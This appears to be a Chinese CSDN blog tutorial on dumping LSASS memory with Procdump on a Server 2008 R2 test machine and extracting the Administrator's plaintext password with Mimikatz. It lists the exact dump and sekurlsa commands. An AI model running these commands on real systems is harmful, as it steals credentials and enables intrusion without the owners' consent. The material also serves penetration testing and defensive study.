Procdump+Mimikatz获取Windows明文密码

本文介绍了如何在Server 2008 R2和Server 2012 R2上利用Procdump和Mimikatz工具抓取Windows系统的明文密码。在2008 R2中,直接使用工具成功获取了 Administrator 的密码,而在2012 R2中,由于系统安全增强,需要修改注册表后才能获取。详细步骤包括生成存储文件、修改注册表和执行Mimikatz命令。
摘要由CSDN通过智能技术生成

1、 测试环境

 系统:
  Server 2008 R2
  Server 2012 R2

 工具:
   Procdump:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
   mimikatz:https://github.com/gentilkiwi/mimikatz/releases

2、 抓取密码

 2.1 Server 2008 R2抓取

  2.1.1 生成存储文件
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

  2.1.2 mimiakatz密码获取
cmd运行mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

  如图:成功抓取到Administrator密码明文

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值